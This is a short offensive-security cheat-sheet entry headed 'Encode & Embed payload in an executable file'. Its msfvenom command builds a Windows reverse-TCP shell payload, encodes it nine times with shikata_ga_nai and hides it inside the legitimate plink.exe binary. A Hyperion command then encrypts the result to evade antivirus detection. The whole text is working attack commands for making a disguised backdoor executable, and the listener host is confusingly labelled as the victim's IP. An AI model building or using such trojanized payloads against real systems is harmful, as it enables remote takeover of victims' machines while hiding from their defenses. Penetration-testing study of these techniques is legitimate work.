Encode & Embed payload in an executable file
msfvenom -p windows/shell_reverse_tcp LHOST=$VICTIM_IP LPORT=$VICTIM_PORT \
-f exe -e x86/shikata_ga_nai -i 9 \
-x /usr/share/windows-binaries/plink.exe \
-o encoded_shell.exe
wine hyperion.exe ../encoded_shell.exe ../crypted.exe